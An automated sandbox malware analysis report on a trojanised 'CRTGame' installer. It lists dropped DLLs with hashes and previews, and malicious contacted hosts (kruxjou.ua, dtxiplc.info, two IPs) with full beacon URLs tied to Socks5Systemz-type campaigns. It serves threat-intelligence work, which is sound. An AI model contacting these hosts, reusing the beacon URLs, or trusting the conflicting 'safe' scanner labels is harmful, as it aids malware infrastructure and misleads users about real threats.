C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-0T8SC.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-0U5DK.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-1BOH7.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-2AGLA.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-2ASPL.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-3DI9V.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-40RRA.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-5L10M.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-6I8EB.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-8HTIS.tmp	3%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-9BPJ8.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-A2FB0.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-B6UBH.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-B7IAM.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-BEPVB.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-C1J3V.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-CIN2V.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-DDN59.tmp	3%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-F2AK9.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-FLLBO.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-FQCKS.tmp	3%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-GNGP9.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-GP3AQ.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-GV5KO.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-IQEKE.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-J1FBL.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-J36DT.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-J5DR2.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-JKH63.tmp	3%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://mp4v2.googlecode.com/svn/trunk	0%	Avira URL Cloud	safe
http://www.mp3dev.org/ID3Error	0%	Avira URL Cloud	safe
http://dtxiplc.info/click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568edc0ef019ca	0%	Avira URL Cloud	safe
http://94.232.249.187/click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62dde2	0%	Avira URL Cloud	safe
kruxjou.ua	0%	Avira URL Cloud	safe
https://mp4v2.googlecode.com/svnrepository	0%	Avira URL Cloud	safe
http://kruxjou.ua/click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842965bec4ee8a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9d155bb22	0%	Avira URL Cloud	safe
http://www.mp3dev.org/ID3Error	0%	Virustotal		Browse
https://mp4v2.googlecode.com/svn/trunk	0%	Virustotal		Browse
http://185.237.206.129/	0%	Avira URL Cloud	safe
http://185.237.206.129/click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62dde	0%	Avira URL Cloud	safe
http://185.237.206.129/click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62cde	0%	Avira URL Cloud	safe
http://www.mpg123.de	0%	Avira URL Cloud	safe
https://mp4v2.googlecode.com/svn/trunkrepository	0%	Avira URL Cloud	safe
http://lame.sf.net	0%	Avira URL Cloud	safe
http://mingw-w64.sourceforge.net/X	0%	Avira URL Cloud	safe
http://LosslessAudio.org/0	0%	Avira URL Cloud	safe
http://lame.sf.net32bits	0%	Avira URL Cloud	safe
https://mp4v2.googlecode.com/svn	0%	Avira URL Cloud	safe
http://ocsps.ssl.com0Q	0%	Avira URL Cloud	safe
http://kruxjou.ua/click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568edc0ef019ca	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
kruxjou.ua	185.237.206.129	true	true		unknown
dtxiplc.info	94.232.249.187	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
kruxjou.ua	true	Avira URL Cloud: safe	unknown
http://dtxiplc.info/click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568edc0ef019ca	true	Avira URL Cloud: safe	unknown
http://kruxjou.ua/click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842965bec4ee8a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9d155bb22	true	Avira URL Cloud: safe	unknown
http://kruxjou.ua/click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568edc0ef019ca	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.innosetup.com/	wG1fFAzGfH.tmp, wG1fFAzGfH.tmp, 00000001.00000000.2122667154.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-3QRHG.tmp.1.dr, wG1fFAzGfH.tmp.0.dr	false		high
https://gcc.gnu.org/bugs/):	is-B7IAM.tmp.1.dr	false		high
http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0	is-J1FBL.tmp.1.dr, is-LOMUV.tmp.1.dr	false		high
https://mp4v2.googlecode.com/svn/trunk	is-9BPJ8.tmp.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	is-3DI9V.tmp.1.dr, is-P220F.tmp.1.dr	false		high
http://94.232.249.187/click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62dde2	crtgame.exe, 00000007.00000002.3367201054.0000000000780000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3369579330.0000000003590000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3367201054.00000000007BB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0	is-3DI9V.tmp.1.dr, is-P220F.tmp.1.dr	false		high
http://www.mp3dev.org/ID3Error	is-A2FB0.tmp.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://mp4v2.googlecode.com/svnrepository	is-9BPJ8.tmp.1.dr	false	Avira URL Cloud: safe	unknown
http://ocsps.ssl.com0	is-J1FBL.tmp.1.dr, is-LOMUV.tmp.1.dr	false		high
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	is-3DI9V.tmp.1.dr, is-P220F.tmp.1.dr	false		high
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	is-3DI9V.tmp.1.dr, is-P220F.tmp.1.dr	false		high
http://185.237.206.129/	crtgame.exe, 00000007.00000002.3367201054.00000000007BB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.237.206.129/click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62dde	crtgame.exe, 00000007.00000002.3367201054.0000000000780000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3367201054.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3369579330.0000000003597000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3367201054.00000000007BB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.237.206.129/click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62cde	crtgame.exe, 00000007.00000002.3369579330.00000000035B2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mpg123.de	is-JM3DF.tmp.1.dr	false	Avira URL Cloud: safe	unknown
https://mp4v2.googlecode.com/svn/trunkrepository	is-9BPJ8.tmp.1.dr	false	Avira URL Cloud: safe	unknown
http://crls.ssl.com/ssl.com-rsa-RootCA.crl0	is-J1FBL.tmp.1.dr, is-LOMUV.tmp.1.dr	false		high
http://www.remobjects.com/psU	wG1fFAzGfH.exe, 00000000.00000003.2122176346.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, wG1fFAzGfH.exe, 00000000.00000003.2122004252.0000000002350000.00000004.00001000.00020000.00000000.sdmp, wG1fFAzGfH.tmp, 00000001.00000000.2122667154.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-3QRHG.tmp.1.dr, wG1fFAzGfH.tmp.0.dr	false		high
http://lame.sf.net	is-A2FB0.tmp.1.dr	false	Avira URL Cloud: safe	unknown
https://streams.videolan.org/upload/	is-LPFO4.tmp.1.dr	false		high
http://mingw-w64.sourceforge.net/X	is-PV0J3.tmp.1.dr	false	Avira URL Cloud: safe	unknown
https://www.ssl.com/repository0	is-J1FBL.tmp.1.dr, is-LOMUV.tmp.1.dr	false		high
http://LosslessAudio.org/0	is-PTERI.tmp.1.dr	false	Avira URL Cloud: safe	unknown
http://lame.sf.net32bits	is-A2FB0.tmp.1.dr	false	Avira URL Cloud: safe	unknown
http://www.mp3dev.org/	is-A2FB0.tmp.1.dr	false		high
http://code.google.com/p/mp4v2D	is-9BPJ8.tmp.1.dr	false		high
http://www.remobjects.com/ps	wG1fFAzGfH.exe, 00000000.00000003.2122176346.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, wG1fFAzGfH.exe, 00000000.00000003.2122004252.0000000002350000.00000004.00001000.00020000.00000000.sdmp, wG1fFAzGfH.tmp, wG1fFAzGfH.tmp, 00000001.00000000.2122667154.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-3QRHG.tmp.1.dr, wG1fFAzGfH.tmp.0.dr	false		high
https://mp4v2.googlecode.com/svn	is-9BPJ8.tmp.1.dr	false	Avira URL Cloud: safe	unknown
http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0	is-J1FBL.tmp.1.dr, is-LOMUV.tmp.1.dr	false		high
http://ocsps.ssl.com0Q	is-J1FBL.tmp.1.dr, is-LOMUV.tmp.1.dr	false	Avira URL Cloud: safe	unknown
http://www.sqlite.org/copyright.html.	is-40RRA.tmp.1.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
89.105.201.183	unknown	Netherlands	24875	NOVOSERVE-ASNL	false
94.232.249.187	dtxiplc.info	Syrian Arab Republic	29256	INT-PDN-STE-ASSTEPDNInternalASSY	true
185.237.206.129	kruxjou.ua	Ukraine	21100	ITLDC-NLUA	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1575098
Start date and time:	2024-12-14 13:21:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	wG1fFAzGfH.exe renamed because original name is a hash value
Original Sample Name:	439194c0af02fd82c5540a082543090f.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@15/128@7/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 179 Number of non-executed functions: 243
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:22:37	API Interceptor	429632x Sleep call for process: crtgame.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
89.105.201.183	OFjT8HmzFJ.exe	Get hash	malicious	Socks5Systemz	Browse	404
	N6jsQ3XNNX.exe	Get hash	malicious	Socks5Systemz	Browse	200
	cv viewer plugin 8.31.40.exe	Get hash	malicious	Socks5Systemz	Browse	200
94.232.249.187	AGcC2uK0El.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	6hvZpn91O8.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	j9htknb7BQ.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
185.237.206.129	Invoice.xlsx	Get hash	malicious	FormBook	Browse	185.237.206.129/jinn.exe

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ITLDC-NLUA	AGcC2uK0El.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse	185.237.206.129
	file.exe	Get hash	malicious	AgentTesla	Browse	185.174.173.22
	secure.htm	Get hash	malicious	HTMLPhisher	Browse	217.12.218.219
	EIqeWlQMGR.exe	Get hash	malicious	AgentTesla	Browse	185.174.175.187
	9WqvcxYptm.exe	Get hash	malicious	AgentTesla	Browse	185.174.173.22
	sd2.ps1	Get hash	malicious	Unknown	Browse	195.123.217.43
	Pago_7839389309_8w20w808_723869189.exe	Get hash	malicious	AgentTesla	Browse	185.174.175.187
	RRT78-89079090GFVU0-INVRYU-FVIOJ0I.exe	Get hash	malicious	MassLogger RAT	Browse	185.174.173.22
	FATURA.exe	Get hash	malicious	FormBook	Browse	185.174.173.22
	TAX INVOICE.exe	Get hash	malicious	FormBook	Browse	185.174.173.22
NOVOSERVE-ASNL	getlab.exe	Get hash	malicious	Socks5Systemz	Browse	89.105.201.183
	file.exe	Get hash	malicious	Nymaim, Socks5Systemz	Browse	89.105.201.183
	i7j22nof2Q.exe	Get hash	malicious	Socks5Systemz	Browse	89.105.201.183
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	89.105.201.183
	file.exe	Get hash	malicious	Socks5Systemz	Browse	89.105.201.183
	file.exe	Get hash	malicious	Socks5Systemz	Browse	89.105.201.183
	file.exe	Get hash	malicious	Socks5Systemz	Browse	89.105.201.183
	gxjIKuKnu7.exe	Get hash	malicious	Socks5Systemz	Browse	89.105.201.183
	OFjT8HmzFJ.exe	Get hash	malicious	Socks5Systemz	Browse	89.105.201.183
	BJqvg1iEdr.exe	Get hash	malicious	Socks5Systemz	Browse	89.105.201.183
INT-PDN-STE-ASSTEPDNInternalASSY	AGcC2uK0El.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse	94.232.249.187
	6hvZpn91O8.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse	94.232.249.187
	j9htknb7BQ.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse	94.232.249.187
	jade.arm.elf	Get hash	malicious	Mirai	Browse	31.9.99.97
	jade.ppc.elf	Get hash	malicious	Mirai	Browse	95.212.143.36
	jade.x86.elf	Get hash	malicious	Mirai	Browse	31.14.164.17
	Josho.ppc.elf	Get hash	malicious	Unknown	Browse	95.212.143.56
	la.bot.mips.elf	Get hash	malicious	Mirai	Browse	178.171.212.67
	home.mips.elf	Get hash	malicious	Gafgyt, Mirai	Browse	188.247.2.172
	home.m68k.elf	Get hash	malicious	Gafgyt, Mirai	Browse	46.57.220.121

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)	AGcC2uK0El.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	6hvZpn91O8.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	j9htknb7BQ.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	SecuriteInfo.com.Win32.Malware-gen.2354.25353.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win32.Malware-gen.2354.25353.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win32.Malware-gen.27540.30253.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win32.Malware-gen.27540.30253.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win32.Malware-gen.371.3693.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win32.Malware-gen.371.3693.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win32.Malware-gen.18181.11360.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	337408
Entropy (8bit):	6.515131904432587
Encrypted:	false
SSDEEP:	6144:3nzsyDn7PDS+FDflUjvJUkbEOyF1rOpsuCOuOff5k4F/lTRHA:3377SKfgvqkbFyFJCRRzH
MD5:	62D2156E3CA8387964F7AA13DD1CCD5B
SHA1:	A5067E046ED9EA5512C94D1D17C394D6CF89CCCA
SHA-256:	59CBFBA941D3AC0238219DAA11C93969489B40F1E8B38FABDB5805AC3DD72BFA
SHA-512:	006F7C46021F339B6CBF9F0B80CFFA74ABB8D48E12986266D069738C4E6BDB799BFBA4B8EE4565A01E90DBE679A96A2399D795A6EAD6EACBB4818A155858BF60
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: AGcC2uK0El.exe, Detection: malicious, Browse Filename: 6hvZpn91O8.exe, Detection: malicious, Browse Filename: j9htknb7BQ.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Malware-gen.2354.25353.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Malware-gen.2354.25353.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Malware-gen.27540.30253.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Malware-gen.27540.30253.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Malware-gen.371.3693.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Malware-gen.371.3693.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Malware-gen.18181.11360.exe, Detection: malicious, Browse
Reputation:	high, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@..\|...\|...\|...p...\|...w...\|.d.r...\|...v...\|...x...\|.i.#...\|...}.\|.\|.d.!...\|...w...\|..V....\|...v...\|.......\|. .z...\|.Rich..\|.........PE..L....r.b.....................>......\........ ....@.......................................@.....................................x....0.......................@...3................................................... ..(............................text............................... ..`.rdata..r.... ......................@..@.data....'..........................@....sxdata...... ......................@....rsrc........0......................@..@.reloc...<...@...>..................@..B........................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\COPYING.LGPLv2.1 (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	ASCII text
Category:	dropped
Size (bytes):	26526
Entropy (8bit):	4.600837395607617
Encrypted:	false
SSDEEP:	384:Lc56OuAbnn0UReX6wFDVxnFw7xqsvzt+z/k8E9HinIhFkspcM9bc7ups0CZuQG:Lc5trLeDnFMz1ReScmc7GshZuQG
MD5:	BD7A443320AF8C812E4C18D1B79DF004
SHA1:	37D2F1D62FEC4DA0CAF06E5DA21AFC3521B597AA
SHA-256:	B634AB5640E258563C536E658CAD87080553DF6F34F62269A21D554844E58BFE
SHA-512:	21AEF7129B5B70E3F9255B1EA4DC994BF48B8A7F42CD90748D71465738D934891BBEC6C6FC6A1CCFAF7D3F35496677D62E2AF346D5E8266F6A51AE21A65C4460
Malicious:	false
Preview:	GNU LESSER GENERAL PUBLIC LICENSE. Version 2.1, February 1999.. Copyright (C) 1991, 1999 Free Software Foundation, Inc.. 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...[This is the first released version of the Lesser GPL. It also counts. as the successor of the GNU Library Public License, version 2, hence. the version number 2.1.].. Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.Licenses are intended to guarantee your freedom to share and change.free software--to make sure the software is free for all its users... This license, the Lesser General Public License, applies to some.specially designated software packages--typically libraries--of the.Free Software Foundation and other authors who

C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	214016
Entropy (8bit):	6.676457645865373
Encrypted:	false
SSDEEP:	3072:v3UEEkp2yVTcc295GSSazZq0/OlxAOxN5jZ2Ti30ezAg0Fu9RBhk1Xion:cEEpYcc2G/adqLtxLZ2+vAO9Hhkzn
MD5:	2C747F19BF1295EBBDAB9FB14BB19EE2
SHA1:	6F3B71826C51C739D6BB75085E634B2B2EF538BC
SHA-256:	D2074B91A63219CFD3313C850B2833CD579CC869EF751B1F5AD7EDFB77BD1EDD
SHA-512:	C100C0A5AF52D951F3905884E9B9D0EC1A0D0AEBE70550A646BA6E5D33583247F67CA19E1D045170A286D92EE84E1676A6C1B0527E017A35B6242DD9DEE05AF4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}6,.9WB.9WB.9WB...9.:WB.9WC.hWB....;WB."..&WB."..WB."...WB.9WB.?WB."..8WB."..8WB."..8WB.Rich9WB.........PE..L......W...........!.....N...........n.......`............................................@.........................`...h.......(....`..X....................p.......................................................`...............................text...?L.......N.................. ..`.rdata......`.......R..............@..@.data....W.......2..................@....rsrc...X....`......................@..@.reloc..f&...p...(..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	266254
Entropy (8bit):	6.343813822604148
Encrypted:	false
SSDEEP:	3072:F2JQNvPZGde1lxIrPYi/vNN0ZCS+lLLytmEwKuwKwvfNXOndQvmjmkVfte2t6l:FdlP8WUTY0hlL2KqfNamvmjFXe2g
MD5:	8B099FA7B51A8462683BD6FF5224A2DC
SHA1:	C3AA74FFF8BB1EC4034DA2D48F0D9E18E490EA3D
SHA-256:	438DE563DB40C8E0906665249ECF0BDD466092C9A309C910F5DE8599FB0B83D2
SHA-512:	9B81093F0853919BCE3883C94C2C0921A96A95604FD2C2A45B29801A9BA898BD04AA17290095994DB50CBFFCBBD6C54519851FF813C63CD9BA132AE9C6EFA572
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).........J...................................................\....@... ......................P.......`..................................L............................u.......................c...............................text...t...........................`..`.data...............................@....rdata..(...........................@..@/4......t`.......b...r..............@..@.bss.....I...............................edata.......P......................@..@.idata.......`......................@....CRT....,...........................@....tls................................@....rsrc...............................@..@.reloc..L...........................@..B........................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	906766
Entropy (8bit):	6.450201653594769
Encrypted:	false
SSDEEP:	24576:sxJadtgtogJr8nFWojn51vDBgpOpJyqMvDQAmJ:bWoer+Fhjn51vDBgpKMvDeJ
MD5:	AF785965AB0BF2474B3DD6E53DA2F368
SHA1:	EF9EECBD07CCBD3069B30AA1671C2093FA38FEB6
SHA-256:	8CDF4CAD48406CDB2FF6F4F08A8BCAF41B9A5A656CC341F2757B610A7ACA706A
SHA-512:	5F69C61E38D6930F8084DCE001BD592C681850F073F1B82E2914F448750E7514E2B0F8F7591BCB089C84D91FC9F51E96CFC03D204AE052564820723E57B6FE27
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).R...................p...............................P......5.....@... .........................WD..............p.......................\|;...........................+......................X................................text....Q.......R..................`..`.data...L....p.......V..............@....rdata...............Z..............@..@/4...........p.......F..............@..@.bss....4....p...........................edata..WD.......F...>..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc...p...........................@..@.reloc..\|;.......<..................@..B........................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	127669
Entropy (8bit):	7.952352167575405
Encrypted:	false
SSDEEP:	3072:kdGUCKL7Wn/OzU2ThapTv773+HMnBasgGlBM:dn/mU8K/3EgNgoM
MD5:	75C1D7A3BDF1A309C540B998901A35A7
SHA1:	B06FEEAC73D496C435C66B9B7FF7514CBE768D84
SHA-256:	6303F205127C3B16D9CF1BDF4617C96109A03C5F2669341FBC0E1D37CD776B29
SHA-512:	8D2BBB7A7AD34529117C8D5A122F4DAF38EA684AACD09D5AD0051FA41264F91FD5D86679A57913E5ADA917F94A5EF693C39EBD8B465D7E69EF5D53EF941AD2EE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...................................D.... ..PE..L....O?\...........!.................`.......................................p............@..........................b.......a.......0..@...........................................................................<b..H.................................... ..........................@..@.rsrc........0......................@..@......... ...@.........................@petite.......`......................`..`..........................................fE...nj.:<...n...1..}..r..". .S(...#!............7..5.Q..0..}.. .....^y...U...@..3.........&.lp(.pt.a......!..`@C.O3G7..."\..w.1u.$4..1h...M...K6.L...L..~.w...b2x-.......9k".....".V\............o..................qO&.......4(."0.Zy....2..Y..Z..:2.XM..D....a&..&.L,......./+......c<...^.2.x0..H.618....Q.Q.5.%...Z1.I.......a...q-}.0..D....o.!.....O.......B....# O.!....cY5.#...n.`..1...r!.)].:...m.f.....x....N"t.j..l.....:/...,.v........8F.N...X..j.R......"...&...

C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	149845
Entropy (8bit):	7.893881970959476
Encrypted:	false
SSDEEP:	3072:y0z4JQHu5EvSA/JqiK2s6g+hUCQiMVQ623hi3JKz8KQP6ZwhQrNrbZ:yUju5GY7l+CCYVQ62YUzXQiqhQrJbZ
MD5:	526E02E9EB8953655EB293D8BAC59C8F
SHA1:	7CA6025602681EF6EFDEE21CD11165A4A70AA6FE
SHA-256:	E2175E48A93B2A7FA25ACC6879F3676E04A0C11BB8CDFD8D305E35FD9B5BBBB4
SHA-512:	053EB66D17E5652A12D5F7FAF03F02F35D1E18146EE38308E39838647F91517F8A9DC0B7A7748225F2F48B8F0347B0A33215D7983E85FCA55EF8679564471F0B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
